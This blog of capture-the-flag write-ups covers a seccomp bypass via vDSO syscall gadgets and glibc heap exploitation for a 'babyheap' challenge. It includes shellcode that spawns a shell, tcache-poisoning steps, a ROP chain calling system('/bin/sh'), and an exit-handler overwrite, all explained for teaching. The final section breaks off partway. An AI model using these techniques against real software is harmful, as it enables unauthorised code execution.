Ub1k's Blog | Capture The Flag & Vulnerability Research

he_protecc: CornCTF 2025

David Hermes — Fri, 20 Jun 2025 00:00:00 GMT

he_protecc: CornCTF 2025

This is the first pwn challenge in the CornCTF 2025.

Upon inspecting the binary we immediately notice two things:

The security mitigations are very relaxed: the GOT is writable (Partial RELRO) and the code area is not position independent (No PIE) and as such is not randomized.
The ELF is statically linked: so we can exclude ret2libc and we have to ignore shenanigans with dynamic libraries this time.

By executing the binary we are prompted to input the length of some shellcode followed by the code itself.

It would definitely be too easy if we could execute a execve("/bin/sh",null,null) and get the shell. Let's take a closer look at the binary to see what's really happening.

Looking around

Disassembling the binary reveals an easy to read and understand code, let's look at the most important stuff.

mmap my beloved

:::note mmap() creates a new mapping in the virtual address space of the calling process. In other words, it creates a new data area in a position and with permissions decided by the caller, it is used in dynamically loaded binaries and in some cases in heap allocation. In our case the program needs a mmap region because we don't have an area that is writable and executable at the same time. :::

The mmap call is easy to understand:

New memory area is mapped at position 0x500000.
The size is 0x1000 bytes (one page or 4096 bytes).
The permission parameter is RWX: 001 | 010 | 100 = 111 (7)

To understand the flags we can use the strace command and read the instruction from there:

These two flags simply signal that the mapped region is private to our process and not mapped to any file, this means the area is initialized with zeroes.

A boring mmap region, nothing special here... sadly

seccomp

I'm not going to show the full setup_seccomp() disassembly as it is a bit ugly, the important part comes at the end:

The prctl call sets the NO_NEW_PRIVS flag, why? This is a security measure to stop privilege escalation made by malformed seccomp filter, so we put it before every seccomp installation (explanation). The next instruction, the syscall, installs a seccomp filter on the binary.

:::note As the name suggests, seccomp is a mechanism to harden syscall access by evaluating a small program called a Berkeley Packet Filter (BPF) for every syscall. Based on the result, the syscall is either allowed or denied. :::

So the questions becomes: What does this seccomp filter allow? I was today years old when I learned that I don't need to manually decode seccomp filters... there exists a tool for that, thanks Marco. (Github):

So by executing seccomp-tools dump ./protected we get:

 line  CODE  JT   JF     K
=================================
 0000: 0x20 0x00 0x00 0x00000008  A = instruction_pointer
 0001: 0x01 0x00 0x00 0x003fffff  X = 4194303 (0x3fffff)
 0002: 0x2d 0x00 0x0a 0x00000000  if (A <= X) goto 0013
 0003: 0x01 0x00 0x00 0x004b7fff  X = 4947967 (0x4b7fff)
 0004: 0x2d 0x00 0x07 0x00000000  if (A <= X) goto 0012
 0005: 0x01 0x00 0x00 0x004fffff  X = 5242879 (0x4fffff)
 0006: 0x2d 0x00 0x06 0x00000000  if (A <= X) goto 0013
 0007: 0x01 0x00 0x00 0x00500fff  X = 5246975 (0x500fff)
 0008: 0x2d 0x00 0x03 0x00000000  if (A <= X) goto 0012
 0009: 0x20 0x00 0x00 0x0000000c  A = instruction_pointer >> 32
 0010: 0x01 0x00 0x00 0x00007fff  X = 32767 (0x7fff)
 0011: 0x2d 0x00 0x01 0x00000000  if (A <= X) goto 0013
 0012: 0x06 0x00 0x00 0x80000000  return KILL_PROCESS
 0013: 0x06 0x00 0x00 0x7fff0000  return ALLOW

This is not a typical seccomp filter. Normally a seccomp filter checks the syscall number against a whitelist and returns if it is permitted or not, but here the filter loads the RIP at the moment of execution of the syscall and only returns ALLOW if the position is one of the following, else the process gets killed:

Before 0x3FFFFF: but that's not possible because the address space starts at 0x400000
Between 0x4b7fff and 0x4fffff: but there are no syscalls in that region.
Between 0x500fff and 0x7fffffffffff: After the mmap regio, so this is why we can't execute a syscall in the shellcode :(

But WAIT, what can we find after 0x500fff but before 0x7fffffffffff?

Let's run our debugger of choice and look at the mappings:

Using vmmap we can see that only one mapping has read and execution permission, and that is vdso.

:::note vDSO (virtual dynamic shared object) is a kernel mechanism for exporting a carefully selected set of kernel space routines to user space applications so that applications can call these kernel space routines in-process, without incurring the performance penalty of a mode switch from user mode to kernel mode. (Wikipedia) :::

By piping the instructions found in that memory area into grep we can see a few syscall instruction inside vdso, jumping to them should give us the syscall we need!

Leak & Pwn

Here comes the problem, even if the ELF is not PIE, the stack and also vdso still get randomized by ASLR, even worse, the internal offsets also get randomized... But let's tackle one problem after another:

The Leak

Using p2p stack vdso we can see 4 leaks on the stack for vdso, let's choose the first one.

Assembly

Now comes the difficult part, we can't calculate the offset between the syscalls and our leak because we cannot guarantee that the internal offsets are the same in the remote binary, we need to scan the memory area...

The first part is easy, let's take the first leak and put it into a register:

mov r8, [rbp - 0x218]

We could zero out the 12 least significant bits of this leak to align the address to the start of a memory page, but in our case, it's unnecessary, we already know there are 5 syscall instructions diseminated in the region and it is impossible that they are all contained in the first 0x340 bits of the page. Now let's scan the memory region for a syscall instruction, remember that it's opcode is 0x0F05 but we are in little-endian so we need to reverse the order of bits:

loop:
inc r8
mov ax, word ptr [r8]
cmp ax, 0x050f // <-- syscall opcode but reversed
jne loop

This code snipped increases r8 (pointer to vdso leak) and reads two bytes, it then checks if the bytes are equal to the one representing syscall, if not, it continues the loop. If it exits instead, r8 will point to a valid syscall instruction, and we can continue with setting the other registers for an execve call.

mov r9, {u64(b"/bin/sh\0")}
push r9

mov rax, 59 
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx

jmp r8 // <-- jump to syscall outside our mmap area

sending this payload will spawn a shell and with a simple cat flag.txt we get the flag!

Babyheap: JustCTF - Chapter 1

David Hermes — Mon, 20 Oct 2025 00:00:00 GMT

Normally, especially for beginners, seeing a baby challenge is always a very refreshing alternative to the high level tasks made to challenge also the best of players.

You solve a very simple challenge and have the possibility to encounter a new technique in a simple and protected setting. Baby heap breaks one of these assumptions, to be fair, it was never written which type of baby is intended in the title, a newborn beluga whale for example can weight even $100$kg, enough to crush my sanity.

By the end of this write-up, I hope you’ll understand both my frustration and my realization: maybe my assumptions about baby challenges were wrong from the start. In fact, I learned more about libc internals and exploitation techniques in this single challenge than in all the other “baby” ones combined.

This is a two-part journey: from simple heap exploitation to advanced techniques, and finally, as dessert, an exit_function overwrite and environ leak.

The disassembly

As usual, we are not going to look at the entire binary, but instead focusing on the relevant parts. For context, the program is straightforward:

create_chunk() Allocates a buffer of size 0x30.
modify_chunk() Allows you to overwrite the contents of an existing chunk.
read_chunk() Reads the full 0x30 bytes from a chunk.
delete_chunk() Frees the chunk.

We are gonna concentrate on two of these functions:

//babyheap
int create_chunk()
{
  int index; // [rsp+Ch] [rbp-4h]

  index = get_index();
  if ( *((_QWORD *)&chunks + index) )
	return puts("This index is already in use");
  *((_QWORD *)&chunks + index) = malloc(0x30uLL);
  printf("Content? ");
  printf("Content? "); //wtf why?
  return read(0, *((void **)&chunks + index), 0x30uLL);
}

As described above, this function creates a chunk and saves the address to an array of max $20$ entries, if the entry is occupied it returns without allocating and gives an error message.

//babyheap
void delete_chunk()
{
  int index; // [rsp+Ch] [rbp-4h]

  index = get_index();
  if ( *((_QWORD *)&chunks + index) )
    free(*((void **)&chunks + index));
  else
    puts("This chunk is empty");
}

Looking at the delete_chunk()function we notice that it doesn't remove the address from the array once deleted. This has a few implications, first it is possible to read and write to a freed chunk, and second, once created a chunk you cannot call a second time create_chunk() on the same index, this limits our create_chunk() calls to maximum 20.

Heap Exploitation

:::warning Heap exploitation is a complex topic, so I won’t go too deep here. If you are interested here is a link to some material. :::

When malloc() is called, generally, a memory address to the heap is returned, this address points to the user data of a struct, the sections above contain important metadata. We like to call this memory areas chunks.

From now one we will consider the header part of the chunk, so it’s size becomes 0x40 instead of 0x30. Looking at the chunks header, we notice a few significant fields: The size field stores the amount of bytes that divide this chunk from the next one, yet nothing stops us from writing more bytes than the amount specified in the size field. Another interesting part is the P flag, if prev_used is set, free() knows that the previous chunk is currently allocated, if the flag isn't set, the allocator could try to fuse together the two chunks to create a bigger one.

The bins

When a chunk is freed, from LIBC-2.26 onwards the deallocator first tries to place an address pointing to the user data as the first element of a per-size-class singly linked list called the tcache, which can hold up to 7 elements in every class of max 0x410 bytes of size.

In the free operation, the first 0x10 bytes of the user data are overwritten with a pointer to the next chunk in the list (fd) and a random value called tcache key used to prevent double frees (not to be confused with the tcache mangling key explained later in this chapter). This means that when a freed chunk is read, you won't read the content it stored before but a pointer to a previously freed chunk or, if this is the first freed chunk, a null pointer.

If more than 7 chunks of the same size are freed, and the chunk is between 0x20 and 0x80 bytes long, the allocator adds them into the fastbin. Fastbins have no limit on the number of chunks they can store, but are limited by the before mentioned size classes, also the fd pointer doesn't point to the next fd pointer but to the prev_size field.

If the tcache is full and the elements are not compatible with the fastbin size-classes, or in very specific cases when mechanisms trigger fastbin consolidation (foreshadowing), chunks are placed into the unsortedbin. From there they can get sorted into largebins or smallbins.

This last three bins are implemented as doubly-linked circular lists. These have their head stored in the libc address space, to be more precise, in the main_arena, and because of the circular nature of these lists, the last element has a forward (fd) pointer to the head of the list stored in the arena, also because of the double-link, the first element has a backwards pointer (bk) to it too. So by reading a freed chunk in these bins you can receive a libc leak.

tcache poisoning

If this binary had Partial RELRO and was non-PIE, we could have allocated two chunks and then freed them.
Once freed, both chunks would be placed into the tcache linked list, and where their data once resides, pointers to the next chunk in the linked list would now be written. By modifying the last freed chunk’s forward pointer (first element in the tcache list) to point to something like the GOT, the allocator would think that the first deallocated chunk (second element in the tcache) is stored in the GOT table.

:::warning From LIBC-2.32 The forward pointer (fd) addresses saved in the freed tcache entries are encoded (mangled).

//libc internals
#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)

The macro takes as input the position where the pointer is saved and the location where the pointer is pointing too.

It then shifts away the 12 least significant bits of the position value, a memory page is generaly 0x1000 (16 bits) long, so we are removing the information about page internal positioning, leaving only the page address. In other words two chunks in the same page will have the same ((size_t) pos) >> 12) value. It then xores this value with the pointer to mangle it.

This ensures that the encoded value depends both on the pointer and on the page where it is stored. Pointers stored in different pages will be mangled differently, even if they point to the same target.

By doing the same operatin again we can reveal the pointer.

But this encoding is easily reversed, the page address used for mangling is part of the address itself, so this algorithm could be defined as a deterministic scramble. Xoring the mangled pointer with shifted parts of itself completly decodes the pointer.

def demangle_alone(ptr,page_offset=0):
	mid = ptr ^ ((ptr>>12)+page_offset)
  	return mid ^ (mid>>24)

::: Then, by reallocating the two chunks, the allocator would return the address of the GOT as the second allocation (the first 16 bytes get zeroed out, look at the note below), we could then:

Read from the GOT by reading from the second chunk to leak a libc address, but this only works with ‘fwrite()’ or similar because the first 0x10 bytes are null pointers terminating ‘printf’ or ‘puts’ instantly.
Overwrite a GOT entry (free) with the address of system(), giving us a shell the next time that function is called.

:::note From LIBC-2.29 after the 8 byte fd pointer saved in the chunk, another 8 bytes get used to store the tcache key, these 16 bytes get zeroed out when a chunk gets allocated. If this tcache key is present when a free operation is done, that tcache bin gets checked for a double free, else no check is done. ::: But that’s not the case here… behold:

Still, this very simple technique called tcache poisoning will prove useful several times throughout this writeup.

But let’s exit this hypothetical scenario and focus on the real limitations we face: the binary has no apparent address leak and no buffer overflow, we need to take control in some other way.

The Plan

Our actual goal is to gain arbitrary read and write primitives within libc. With these, we can leak crucial pointers like __envrion, __exit_functions or other stuff, and eventually get to a shell. At this point, it’s worth clarifying that I didn’t solve this challenge during the competition itself. Instead, I studied various writeups to deeply understand the possible solutions and their underlying mechanics.

I’ll present two methods to leak a libc pointer, followed by two techniques to leverage that leak to achieve a shell. The first leak and exploit can be found in this part, the second part includes a more exotic variant.

House of something

As explained in the heap primer, the heads of the linked lists for smallbin, largebin, and unsortedbin live in main_arena inside libc. Those lists are doubly linked and circular. If we can move a chunk into one of those bins we can read the fd pointer that points back into libc and obtain a libc leak usable later.

Sending a chunk into those bins requires freeing a large enough chunk. The tcache holds chunks up to size 0x410 (inclusive), so we must either create a single chunk larger than 0x410 or free more than seven smaller chunks while avoiding the fastbin path (above 0x80 bytes), we will try to deallocate a 0x410 or greater size chunk.

Reasoning about chunks

Question: By manipulating a chunk’s fd pointer (tcache poisoning) to position the next chunk in the tcache list just above a previously allocated third chunk, is it possible to use the first chunk to alter the size metadata of the second chunk, so that when the third chunk is freed, the allocator interprets its size as 0x420 bytes and moves the chunk into unsortedbin?

In theory, yes, but with important caveats. We must have a second chunk immediately after our forged chunk (including it's modified size), in this way when we free the giant chunk it doesn't get trimmed away.
Targeting a 0x420 size will cross past the current top chunk, so we need to allocate enough intermediate chunks until our guard chunk (the second chunk mentioned before) sits directly after our forged chunk. Only then can freeing the forged chunk make the allocator interpret a 0x420 size and move the chunk to unsortedbin instead of trimming it away, producing the desired libc leak.

To guarantee that an extra chunk is placed immediately behind our forged 0x420 chunk we expand the forged size slightly to 0x440. Because small chunks are 0x40 bytes, the 0x440 size ensures the forged chunk completely overlaps the final small chunk in that region.

But it's not so simple, with 19 allocations we don't have enough chunks to push the top chunk behind our forged one and also have enough allocations to do some tcache poisoning for our final exploitation. We need another strategy.

tcache_perthread_struct

The Tcache has a significant property that the other bins don't have, it is local to a specific thread, if more threads are present in the process, more tcaches are created. To make this work, for every thread a tcache struct called tcache_perthread_struct is allocated that contains the heads of the linked lists and the number of freed chunks. For our primary thread the 0x290 bytes long perthread_struct is allocated at the top.

//glibc internals https://elixir.bootlin.com/glibc/glibc-2.42/source/malloc/malloc.c#L3127
typedef struct tcache_perthread_struct
{
  uint16_t num_slots[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

By using the heap command in pwndbg we can spot the perthread chunk (first one), the second one is a 0x40 chunk created through the menu of the program and the last on is the topchunk:

So, could we use this chunk as our forged chunk?
Yes. Even though we never directly allocated this chunk and thus did not receive its pointer, we can still allocate a new chunk that completely overlaps the first 0x40 bytes of the perthread_struct. From there, we can modify its size field using a slightly overlapping chunk, just like the technique described earlier. By adding new chunks the allocator will place them after the 0x290 perthread_chunk like in the image above.

This approach significantly reduces the number of required allocations to correctly position the guard chunk, from 16 allocations (excluding the guard and the two overlapping chunks) down to just 6.

The main drawback is that the perthread_struct becomes corrupted, breaking the tcache metadata, in particular the amount of stored chunks saved at the beginning of the struct get zeroed out by the allocation and filed with values at the deallocation. Nevertheless, this appears to be our only viable option for obtaining a chunk large enough for the intended purpose.

You are 0x440 bytes big, trust me

Talk is cheap, so let’s move to the practical part.
We’ll use tcache poisoning to place a chunk precisely at the location of the perthread_chunk the deallocator will mistake the perthread_chunks size as the one of our own chunks. Then, we allocate a second chunk and poison the tcache again so that it partially overlaps the perthread/fake-chunk metadata. This overlapping chunk gives us write access to the perthread metadata, allowing us to modify its size field from 0x290 to 0x440.

Next, we allocate enough chunks to push the top chunk downward, six allocations plus the guard chunk.
By looking at the addresses of the chunks in the image below we can notice the modified perthread chunk with the guard chunk right beneath it.

Finally, we free the chunk placed over the perthread structure, the deallocator will check the size and moves the pointer to the unsorted bin. During this process, the unsorted bin writes fd (forward) and bk (backward) pointers into the freed chunk; these pointers reference main_arena. Reading from the freed chunk’s user area thus reveals a libc pointer leak!.

ROP exploit using `__environ`

Once we have arbitrary read and write into the libc getting a leak to the stack is very simple, enter __environ.

The __environ variable

:::note Yes, here's a joke about __environ: __environ goes to therapy. Talks nonstop for hours. Then it asks, “Why always me?”
Therapist responds, “It all comes from your environment.” ::: __environ is a global variable pointing to the environment variables saved on the stack:

environ = libc_base + libc.symbols.__environ

The ROP chain

We can use tcache poisoning to overwrite the fd pointer of the first freed chunk with the address of __environ. After allocating twice, the second allocation will return a chunk overlapping the __environ pointer.

Keep in mind: malloc() zeroes out the first 0x10 bytes, so we must allocate at an offset. In this case, we offset by 0x18 because chunks must also be aligned to 0x10:

environ_leak = u64(read(r, 10)[0x18:0x20])

From here we get the environment stack variables and subtract the main return address from it, we get a permanent offset that when added on our environ leak will yield us the main address.

Using our tcache poisoning technique again, we can modify the return address and set a ROP gadget chain, I opted for:

pop_rdi = libc_base + 0x000000000010f75b
binsh = libc.binsh() + libc_base
ret = pop_rdi + 1
system = libc_base + libc.symbols.system

return_pointer = environ_leak - 0x130 # 0x130 is the offset from environ to main return
update(r, 9, p64((return_pointer-0x08) ^ mask)) # 0x08 for heap alignment
create(r, 11, b"dummy")
create(r, 12, p64(0) + p64(pop_rdi) + p64(binsh) + p64(ret) + p64(system))

We need to add a single ret instruction because the stack is not aligned to a multiple of 0x10. Using the pop rdi instruction and summing $1$ gives us a single ret instruction because pop rdi is a single byte.

:::note Sometimes a perfect ROP chain still crashes the target. One common cause is stack misalignment. Many libc functions require the stack to be 0x10 aligned to accommodate SIMD instructions . Adding a single ret gadget before your chain moves the stack by 0x08, fixing the alignment. :::

Now when returning system(/bin/sh) will be executed giving us a shell.

Babyheap: JustCTF - Chapter 2

David Hermes — Tue, 21 Oct 2025 00:00:00 GMT

Let's tackle the next chapter of babyheap, this one is a bit more exotic...

scanf and black magic

Let’s examine the menu’s scanf input function.
Question: how can you send it an arbitrarily long number without triggering a buffer overflow?
Answer: it uses the heap.

Ocean of scanf

//babyheap main function
printf("Menu:\n1) Create\n2) Read\n3) Update\n4) Delete\n0) Quit\n> ");
if ( (unsigned int)__isoc99_scanf(" %d", &v4) != 1 )
{
	puts("Invalid input");
	exit(0);
}

But if scanf() always uses the heap then why don't we see tcache chunks in the free list after every execution? To understand what is going on, let's start gdb and set a breakpoint at *malloc. If we send 42 to scanf, malloc doesn't get called, but when we send a very big number, the program breaks at a malloc call! Using finish we can exit the malloc call and see the function that executes it:

   0x7ffff7ca9a3b <__GI___libc_scratch_buffer_grow_preserve+107>:       call   QWORD PTR [rip+0x15f597]        # 0x7ffff7e08fd8 (malloc)
=> 0x7ffff7ca9a41 <__GI___libc_scratch_buffer_grow_preserve+113>:       mov    rdi,rax

libc_scratch_buffer_grow_preserve() Is our perpetrator then, but let's step back and follow the implementation of vfscanf(): after "%d" gets read by vfscanf, it enters a loop where every iteration a char is taken from stdin using incchr() and moves the character into a charbuffer by calling char_buffer_add() till an EOF is found or its width becomes zero.

//glibc internals https://elixir.bootlin.com/glibc/glibc-2.42.9000/source/stdio-common/vfscanf-internal.c#L1823

while (c != EOF && width != 0)
{
	... a LOT of stuff ...	
	
	char_buffer_add (&charbuf, c); <-- wrapper around wrapper around grow_preserve
	if (width > 0)
		--width;

	c = inchar ();
}

It then adds a zero byte at the end to transform the number into a string and executes __strtol_internal, this function transforms the string into a long integer.

//glibc internals https://elixir.bootlin.com/glibc/glibc-2.42.9000/source/stdio-common/vfscanf-internal.c#L1932

/* Convert the number.  */
char_buffer_add (&charbuf, L_('\0'));
if (char_buffer_error (&charbuf))
{
  ... error stuff ...
}
if (need_longlong && (flags & LONGDBL))
{
  ... if a longlong is needed stuff ...
}
else
{
  if (flags & NUMBER_SIGNED)
num.l = __strtol_internal                                    //<-- HERE
  (char_buffer_start (&charbuf), &tw, base, flags & GROUP);
  else
num.ul = __strtoul_internal
  (char_buffer_start (&charbuf), &tw, base, flags & GROUP);
}

But by setting "%d" didn't we want to save an integer? Why is the string converted into a long integer? Don't worry, shortly after the above code the number gets cast into the right format and moved into the argument given to scanf():

//glibc internals https://elixir.bootlin.com/glibc/glibc-2.42.9000/source/stdio-common/vfscanf-internal.c#L1961
 
if (!(flags & SUPPRESS))
{
	if (flags & NUMBER_SIGNED)
	{
	  if (need_longlong && (flags & LONGDBL))
		*ARG (LONGLONG int *) = num.q;
	  else if (need_long && (flags & LONG))
		*ARG (long int *) = num.l;
	  else if (flags & SHORT)
		*ARG (short int *) = (short int) num.l;
	  else if (!(flags & CHAR))
		*ARG (int *) = (int) num.l;                    //<-- long to int and stored in the
	  else                                             //    argument given to scanf
		*ARG (signed char *) = (signed char) num.ul;
	}
	else
	{
	  ... same as above but unsigned ...
	}
	
	... more stuff...
}

Now we know how a number gets transformed into an integer. But we ignored a key aspect of this code: char_buffer_add moves characters from stdin into a buffer, so let's understand how the function works. This function is a wrapper around char_buffer_add_slow() which uses a scratch_buffer to save data:

//glibc internals https://elixir.bootlin.com/glibc/glibc-2.42.9000/source/include/scratch_buffer.h#L66
struct scratch_buffer {
  void *data;    /* Pointer to the beginning of the scratch area.  */
  size_t length; /* Allocated space at the data pointer, in bytes.  */
  union { max_align_t __align; char __c[1024]; } __space;
};

This struct contains a pointer to a writable buffer (*data), the length of said buffer (length), and the 1024 byte memory area itself (__space). In the initialization process of the scratch_buffer the address of the memory area gets stored in *data, if more than 1024 bytes must be stored, char_buffer_add_slow() will call __libc_scratch_buffer_grow_preserve, this functions allocates a new buffer in the heap with double the size and modifies the *data pointer and the length. This is why malloc gets called only when big numbers are sent to scanf, we need more than 1024 characters to trigger the heap allocation.

//glibc internals
__libc_scratch_buffer_grow_preserve (struct scratch_buffer *buffer)
{
	size_t new_length = 2 * buffer->length; <--- 1024 * 2
	void *new_ptr;
	
	if (buffer->data == buffer->__space.__c)
    {
	/* Move buffer to the heap.  No overflow is possible because
	buffer->length describes a small buffer on the stack.  */
	new_ptr = malloc (new_length);                   //<-- HERE WE BREAKED
	if (new_ptr == NULL)
		return false;
	memcpy (new_ptr, buffer->__space.__c, buffer->length);
    }
	else
    {
	/* Buffer was already on the heap.  Check for overflow.  */
	if (__glibc_likely (new_length >= buffer->length))
		new_ptr = realloc (buffer->data, new_length);
    else
	{
		... error stuff ...
	}

    if (__glibc_unlikely (new_ptr == NULL))
	{
		/* Deallocate, but buffer must remain valid to free.  */
		free (buffer->data);
		scratch_buffer_init (buffer);
		return false;
	}
    }
    
	/* Install new heap-based buffer.  */
	buffer->data = new_ptr;
	buffer->length = new_length;
	return true;
}

Now we know in which situation malloc gets called from scanf, but how can this be helpful to our purpose of leaking a libc address pointer? The scratchpad gets freed after usage and removed from the heap, so how can we maintain a freed chunk in the small or large bins with this knowledge? It seems that our deep dive is not finished yet... enter the depths of malloc.

Deep into malloc

Looking at the malloc() implementation inside libc, we notice that if the requested chunk is larger than the biggest chunk size stored in the smallbins, malloc_consolidate() is called.

//glibc internals
static void *
_int_malloc (mstate av, size_t bytes)
{
	INTERNAL_SIZE_T nb;               /* normalized request size */
	
	... to much stuff here, like a loooot ...
	
	if (in_smallbin_range (nb))
	{
	    ... a bit of stuff here ...
	} 
    else
    {
	    /*
	     If this is a large request, consolidate fastbins before continuing.
	     While it might look excessive to kill all fastbins before
	     even seeing if there is space available, this avoids
	     fragmentation problems normally associated with fastbins.
	     [...]
		*/
		
	    idx = largebin_index (nb);
	    if (have_fastchunks (av))
        malloc_consolidate (av);     //<--- oh look, malloc_consolidate
    }
    
    ... a league of legends lootbox full of stuff here ...
}

The macro in_smallbin_range(nb) is a simple check that returns if the size of the chunk is small enough to stay in smallbins, by looking below we can calculate the smallbin max chunk size as 0x400.

//glibc internals
#define NBINS             128
#define NSMALLBINS         64
#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT ` \\ normally 16
#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > CHUNK_HDR_SZ)
#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)

#define in_smallbin_range(sz)  \
  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)

So what happens if we create a chunk bigger than 0x400 bytes? To answer that, we need to understand what malloc_consolidate does.

:::note malloc_consolidate() in glibc is a function that coalesces small freed chunks from the fastbins into the unsortedbin. Normally, when a small chunk is freed and doesnt enter tcache, it goes into fastbin without being merged with adjacent free chunks to keep free() fast. Over time, this can fragment memory. When malloc() needs a lot of space (when allocating a largebin for example) it calls malloc_consolidate() :::

This means that if we generate a fastbin chunk and trigger in some way malloc_consolidate the generated fastbin chunk gets moved into the smallbin even if it's a small chunk. Reading this chunk gives us a libc leak. But as we discovered before, to execute malloc_consolidate we need to allocate a chunk of size 0x400 or greater, this is where our scanf trick comes handy.

Putting it all together.

We start by generating eight chunks (7 tcache + 1 fastbin) and free them in a particular order to guarantee that the fastbin chunk is not the last one in heap memory. Else, the fastbin chunk would simply be trimmed by malloc_consolidate.

Now we can apply the knowledge gotten from scanf and malloc, let's allocate a chunk big enough to trigger a malloc in scanf, and greater than the smallbin max size to trigger malloc_consolidate. To achieve this we can send b"1"*0x500 to scanf, this is bigger than 0x400 so both scratch_buffer_grow_preserve() and malloc_consolidate() get triggered. The fastbin chunk gets moved to the unsortedbin and then into the smallbin list once the big chunk gets freed after scanf got called.

by using chunk_read() on the first chunk we can leak the libc address!!!!!!!

Exploiting with exit_func overwrite

Looking at the exit() function, we notice that it is only a wrapper around __run_exit_handlers().

//glibc internals
void exit (int status)
{
  __run_exit_handlers (status, &__exit_funcs, true, true);
}

This function executes so-called exit_functions saved into the __exit_funcs global structure. Exit functions can also be registered by the user using atexit().

//example snippet
#include <stdio.h>
#include <stdlib.h>

void cleanup1(void) { puts("cleanup1"); }
void cleanup2(void) { puts("cleanup2"); }

int main(void) {
    atexit(cleanup1);
    atexit(cleanup2);
    printf("Exiting...\n");
    return 0; // triggers cleanup2 then cleanup1
}

So, what exactly is an exit_function?
Looking at the code below, we can see that an exit_function is a struct that wraps a function call. The flavor field indicates that there are multiple types of exit functions that take different combinations of arguments.

//glibc internals
struct exit_function
  {
    long int flavor;
    union
    {
		void (*at) (void);
		struct
		{
		    void (*fn) (int status, void *arg);
		    void *arg;
		} on;
		struct
		{
		    void (*fn) (void *arg, int status);
		    void *arg;
		    void *dso_handle;
		} cxa;
    } func;
  };

Looking at the snippet run_exit_handlers() below we can see how the flavors change the execution of an exit function:

ef_free: slot is dead, ignore
ef_us: nothing happens
ef_on: status code as first argument and user supplied argument as second one
ef_at: function without arguments
ef_cxa: the important one, first argument is user supplied and second one is the status code.

:::note By looking at the example above you can notice that atexit() only registers ef_at functions, if you want to register ef_on functions there is a GNU extensions that implements on_exit(). ::: Question: Why is ef_cxa the best flavor? Answer: We can overwrite the function pointer with system() and set the first argument as /bin/sh

//glibc internals
__run_exit_handlers (int status, struct exit_function_list **listp,
			bool run_list_atexit, bool run_dtors)
{

...

while (cur->idx > 0)
	{
	struct exit_function *const f = &cur->fns[--cur->idx];
	const uint64_t new_exitfn_called = __new_exitfn_called;
	
	__libc_lock_unlock (__exit_funcs_lock);
	switch (f->flavor)
	{
		void (*atfct) (void);
		void (*onfct) (int status, void *arg);
		void (*cxafct) (void *arg, int status);
		
		case ef_free:
		case ef_us:
			break;
	    case ef_on:
			onfct = f->func.on.fn;
			onfct (status, f->func.on.arg);
			break;
	    case ef_at:
			atfct = f->func.at;
			atfct ();
			break;
	    case ef_cxa:
			f->flavor = ef_free;
			cxafct = f->func.cxa.fn;
			cxafct (f->func.cxa.arg, status); // <-- cxa is executed here 
			break;
	}
	  __libc_lock_lock (__exit_funcs_lock);
	  if (__glibc_unlikely (new_exitfn_called != __new_exitfn_called))
	    goto restart;
	}

...

}

Putting it all together

In practice, we are going to inspect the exit handler array entries, look for an exit handler with flavor == 4 (ef_cxa) to overwrite with a pointer to system(), and then set /bin/sh as its first argument. Getting a shell from there is as easy as executing the binary and exiting.

Step 1: Getting the __exit_funcs struct

Using our libc leak obtained before, we get the __exit_funcs struct by summing the offset of the struct with the libc base address. libc uses the symbol initial to point at the exit_funcs, if needed, bigger arrays can be generated to extend the number of exit functions that can be registered, this one is the initial array that always exists:

__exit_funcs = libc_base + libc.symbols.initial

We then overwrite the first tcache forward pointer with this address, remember that when malloc is called the first 16 bytes get zeroed out. After calling malloc() twice, the second call will return a pointer to the initial struct, now we can edit and read from it.

pwndbg> tele 0x7f3046204fc0 <-- libc_base + initial offset
00:0000│  0x7f3046204fc0 (initial) ◂— 0
01:0008│  0x7f3046204fc8 (initial+8) ◂— 1 <-- number of registered funcs
02:0010│  0x7f3046204fd0 (initial+16) ◂— 4 <-- flavor
03:0018│  0x7f3046204fd8 (initial+24) ◂— 0x91b97d6d433887e0 <-- function addrs
04:0020│  0x7f3046204fe0 (initial+32) ◂— 0 <-- argument
... ↓     3 skipped

Looking at the output from pwndbg above, we notice only one entry in the array, fortunately this is a ef_cxa entry, now we only need to replace it with the system() function.

Step 2: Replacing function with system()

Do you notice something wrong with the function address in the snipped above? That's not an address. When an atexit function gets registered, its address is xored with a key called pointer_chk_guard and then rotated left by 17 bits (0x11).
$$ \text{mangled_address} = \texttt{rol}(\text{address} \oplus\ \text{key} , \text{0x11}) $$ $$ \text{address} = \texttt{ror}(\text{mangled_address}, \text{0x11})\ \oplus\ \text{key} $$ But by performing a ROR (rotate right) by 0x11 bits on the mangled address and then XORing the result with the real address, we can easily recover the key. $$ \text{key} = \texttt{ror}(\text{mangled_address}, \text{0x11})\ \oplus \ \text{address} $$ Once we have the key, we can replace the old mangled function address with the mangled system() address and overwrite the argument 0 with /bin/sh\0.

But how do we get the unmangled address to recover the key?
Set a breakpoint at exit() and let the program hit it, then step till you find the ROR and XOR instructions. After the runtime demangles the function pointer you can read the real pointer. Unfortunately, in our case the registered functions position is not relative to libc but to the dynamic loader (ld). Fortunately, the libc contains pointers into the loader mapping, so you can find those with p2p libc ld and use them to resolve the loader base.

Using the same tcache poisoning technique we applied to read and modify the exit function array, we can also leak the loader’s address.
We’ll use the last pointer in the output from p2p, since malloc() writes directly into the allocated area before being able to read meaning we need a writable leak.
Once again, we overwrite the first tcache chunk’s forward pointer with this address, allocate two chunks, and then read from the second one to obtain the loader leak.

:::note The pointer_chk_guard is an element of the Thread Control Block (TCB) stored inside the Thread Local Storage (TLS). TLS is a fixed per-thread storage whose address is saved in a special register. Its position is randomized and very difficult to leak.

The first non address value you see is our canary (stack_chk_guard), you can notice the zero byte at the end, the value stored directly after is our key (pointer_chk_guard).

But pointer_chk_guard is derived from somewhere else:

When the kernel loads an executable, by calling execve, it writes a key-value structure called Auxiliary Vector (auxv) into memory, here many critical values are saved, you can print them by setting the LD_SHOW_AUXV=1 environment variable.

❯ LD_SHOW_AUXV=1 gdb
AT_SYSINFO_EHDR:      0x7fba40212000
AT_MINSIGSTKSZ:       3376
AT_HWCAP:             0x178bfbff
AT_PAGESZ:            4096
